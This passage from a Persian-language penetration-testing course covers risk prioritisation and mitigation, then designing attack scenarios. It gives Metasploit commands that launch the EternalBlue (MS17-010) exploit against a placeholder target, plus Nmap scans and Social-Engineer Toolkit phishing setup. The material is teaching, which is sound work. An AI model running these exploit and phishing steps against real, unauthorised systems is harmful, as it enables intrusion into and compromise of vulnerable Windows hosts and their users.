۳.۱. تحلیل احتمال وقوع تهدیدات

برای تحلیل احتمال وقوع تهدیدات، می‌توانید از مدل‌های آماری یا تجربی استفاده کنید. ابزارهایی مانند RiskWatch به شما کمک می‌کنند که بر اساس داده‌های گذشته و تحلیل‌های انجام‌شده، احتمال وقوع تهدیدات را ارزیابی کنید.

۳.۲. تحلیل شدت اثرات تهدیدات

با استفاده از تکنیک‌هایی مانند Impact Assessment می‌توان شدت اثرات تهدیدات را تحلیل کرد. به‌عنوان مثال، حملات DDoS می‌توانند به‌طور شدید روی عملکرد سیستم‌های آنلاین تأثیر بگذارند.

۳.۳. اولویت‌بندی ریسک‌ها

برای اولویت‌بندی ریسک‌ها، می‌توانید از Matrix Risk Assessment استفاده کنید که بر اساس ترکیب احتمال وقوع و شدت اثرات ریسک‌ها، آن‌ها را اولویت‌بندی می‌کند.

---

۴. روش‌های کاهش ریسک

پس از شناسایی ریسک‌ها و اولویت‌بندی آن‌ها، گام بعدی در ارزیابی ریسک، اتخاذ اقدامات برای کاهش آن‌ها است. روش‌های مختلفی برای کاهش ریسک وجود دارند:

• تقویت زیرساخت‌های امنیتی: استفاده از فایروال‌ها، سیستم‌های تشخیص نفوذ (IDS)، و سیستم‌های پیشگیری از نفوذ (IPS) برای محافظت از شبکه‌ها و سیستم‌ها.
• آموزش کاربران: آموزش کارکنان برای شناسایی حملات فیشینگ و دیگر حملات اجتماعی.
• اجرای به‌روزرسانی‌های امنیتی: به‌طور منظم سیستم‌ها و نرم‌افزارها را به‌روزرسانی کنید تا آسیب‌پذیری‌های شناخته‌شده رفع شوند.

---

جمع بندی

در این بخش، به ارزیابی ریسک و شناسایی نقاط ضعف سیستم پرداختیم. ارزیابی ریسک یک فرآیند حیاتی در شناسایی تهدیدات و آسیب‌پذیری‌ها است که به‌طور سیستماتیک به تحلیل احتمال وقوع و اثرات تهدیدات بر سیستم‌ها و داده‌ها می‌پردازد. ابزارهایی مانند Nessus، Metasploit و RiskWatch می‌توانند در این فرآیند به شما کمک کنند. پس از شناسایی ریسک‌ها، گام‌های لازم برای کاهش و مدیریت آن‌ها باید به‌طور مؤثر اجرا شود تا از آسیب‌پذیری‌های سیستم‌ها و اطلاعات حساس جلوگیری گردد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”ایجاد سناریوهای حمله برای تست مقاومت سیستم در برابر تهدیدات” subtitle=”توضیحات کامل”]ایجاد سناریوهای حمله به‌منظور تست مقاومت سیستم در برابر تهدیدات یکی از روش‌های اساسی در ارزیابی امنیت شبکه و سیستم‌ها است. این فرآیند به‌نام تست نفوذ (Penetration Testing) شناخته می‌شود که در آن حملات شبیه‌سازی‌شده به سیستم‌های موجود اعمال می‌شود تا نقاط ضعف و آسیب‌پذیری‌ها شناسایی شوند. در این بخش، به نحوه طراحی سناریوهای حمله، ابزارهای مورد استفاده، و فرآیند اجرای این تست‌ها پرداخته خواهد شد.

---

۱. اهمیت ایجاد سناریوهای حمله

هدف از ایجاد سناریوهای حمله شبیه‌سازی حملات واقعی است که ممکن است سیستم‌ها را تهدید کنند. این سناریوها باید به‌گونه‌ای طراحی شوند که تمامی جنبه‌های امنیتی سیستم، شامل زیرساخت‌ها، نرم‌افزارها، و سیاست‌های امنیتی را پوشش دهند. برخی از مزایای ایجاد سناریوهای حمله عبارتند از:

• شناسایی آسیب‌پذیری‌های ناشناخته
• ارزیابی توانایی سیستم در برابر حملات مختلف
• اطمینان از اینکه تدابیر امنیتی به‌درستی پیاده‌سازی شده‌اند
• بهبود فرآیندهای امنیتی و مدیریت ریسک

---

۲. طراحی سناریوهای حمله

برای طراحی سناریوهای حمله، ابتدا باید تهدیدات ممکن و آسیب‌پذیری‌های سیستم‌ها شناسایی شوند. سپس بر اساس این تهدیدات، سناریوهای مختلفی طراحی می‌شوند که به‌طور واقعی شرایط ممکن حمله را شبیه‌سازی کنند. مراحل اصلی طراحی سناریوهای حمله به شرح زیر است:

1. شناسایی اهداف و منابع: شناسایی سیستم‌ها، شبکه‌ها، و داده‌هایی که باید مورد ارزیابی قرار گیرند.
2. انتخاب حملات مرتبط: انتخاب انواع حملات مرتبط با هر آسیب‌پذیری مانند حملات DDoS، فیشینگ، یا حملات به پروتکل‌ها.
3. طراحی سناریو: طراحی شرایط حمله، مسیرهای نفوذ، و تکنیک‌های مورد استفاده.
4. تعیین ابزارهای مورد نیاز: انتخاب ابزارهای مناسب برای شبیه‌سازی حمله، مانند Metasploit، Burp Suite، و Nmap.

---

۳. ابزارهای مورد استفاده در سناریوهای حمله

برای شبیه‌سازی حملات و اجرای سناریوهای حمله، ابزارهای مختلفی وجود دارند که می‌توانند به شما در ارزیابی امنیت سیستم‌ها کمک کنند. در این بخش، به بررسی برخی از مهم‌ترین ابزارهای مورد استفاده در سناریوهای حمله می‌پردازیم:

۳.۱. Metasploit

Metasploit یکی از قدرتمندترین ابزارها برای شبیه‌سازی حملات و پیدا کردن آسیب‌پذیری‌ها است. این ابزار به شما امکان می‌دهد تا حملات مختلف را طراحی کرده و سیستم‌ها را در برابر آنها تست کنید.

نحوه استفاده از Metasploit:

1. راه‌اندازی Metasploit:

sudo apt-get install metasploit-framework
msfconsole

2. انتخاب و اجرای یک حمله:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [target_ip]
set LHOST [your_ip]
exploit

۳.۲. Nmap

Nmap ابزاری است که برای اسکن کردن شبکه‌ها و شناسایی سرویس‌های فعال استفاده می‌شود. این ابزار می‌تواند برای شبیه‌سازی حملات مرتبط با پورت‌ها و سرویس‌ها به کار رود.

نحوه استفاده از Nmap برای شبیه‌سازی حمله:

1. اسکن پورت‌ها:

nmap -sT -p 1-65535 [target_ip]

2. شناسایی سرویس‌های فعال:

nmap -sV [target_ip]

۳.۳. Burp Suite

Burp Suite ابزاری جامع برای تحلیل امنیت برنامه‌های وب است که می‌تواند برای شبیه‌سازی حملات مانند تزریق SQL، XSS، و دیگر آسیب‌پذیری‌های برنامه‌های وب استفاده شود.

نحوه استفاده از Burp Suite:

1. نصب Burp Suite:

sudo apt-get install burpsuite

2. راه‌اندازی Burp Suite و تنظیم مرورگر برای استفاده از پروکسی آن.

---

۴. فرآیند اجرای سناریوهای حمله

پس از طراحی سناریوهای حمله و انتخاب ابزارهای مناسب، مرحله بعدی اجرای این سناریوها و تحلیل نتایج به‌دست‌آمده است. مراحل اجرای سناریوهای حمله به شرح زیر است:

1. راه‌اندازی محیط تست: ابتدا باید یک محیط تست ایزوله و امن برای انجام حملات شبیه‌سازی‌شده راه‌اندازی کنید. این محیط می‌تواند شامل سیستم‌های هدف، فایروال‌ها، و سیستم‌های تشخیص نفوذ باشد.
2. اجرای حملات: سپس از ابزارهای مختلف مانند Metasploit و Nmap برای اجرای حملات استفاده کنید. هدف از این مرحله شبیه‌سازی شرایط واقعی حمله و بررسی واکنش سیستم‌ها است.
3. تحلیل نتایج: پس از اجرای حملات، نتایج به‌دست‌آمده باید به‌دقت تحلیل شوند تا نقاط ضعف سیستم شناسایی شوند. این نتایج شامل آسیب‌پذیری‌های کشف‌شده، زمان نفوذ، و اثرات حمله بر سیستم‌ها هستند.
4. تدوین گزارش: پس از اجرای تست‌ها، گزارشی کامل شامل جزئیات حملات، نتایج به‌دست‌آمده و پیشنهادات برای تقویت امنیت سیستم باید تهیه شود.

---

۵. مثال‌های عملی از سناریوهای حمله

برای درک بهتر نحوه اجرای سناریوهای حمله، در اینجا چند مثال عملی از سناریوهای رایج آورده شده است:

۵.۱. حمله به سرویس SMB (EternalBlue)

در این سناریو، حمله به آسیب‌پذیری MS17-010 که در سرویس SMB ویندوز وجود دارد، شبیه‌سازی می‌شود. این حمله می‌تواند برای به‌دست‌آوردن دسترسی به سیستم‌های آسیب‌پذیر استفاده شود.

اجرای حمله با Metasploit:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [target_ip]
set LHOST [your_ip]
exploit

۵.۲. حمله فیشینگ

در این سناریو، حمله فیشینگ شبیه‌سازی می‌شود تا به بررسی ضعف‌های امنیتی مرتبط با رفتار کاربران پرداخته شود. این حمله می‌تواند با استفاده از ابزارهایی مانند Social-Engineer Toolkit (SET) انجام شود.

اجرای حمله فیشینگ با SET:

sudo apt-get install set
setoolkit

سپس دستورالعمل‌های مربوط به ایجاد حمله فیشینگ را دنبال کنید.

---

جمع‌بندی

ایجاد سناریوهای حمله به‌منظور تست مقاومت سیستم در برابر تهدیدات، یکی از مراحل مهم در ارزیابی امنیت سیستم‌ها است. با استفاده از ابزارهای قدرتمندی مانند Metasploit، Nmap و Burp Suite، می‌توان حملات شبیه‌سازی‌شده‌ای را طراحی و اجرا کرد تا نقاط ضعف سیستم‌ها شناسایی شوند. این فرآیند به شناسایی آسیب‌پذیری‌ها و بهبود اقدامات امنیتی کمک می‌کند.[/cdb_course_lesson][/cdb_course_lessons]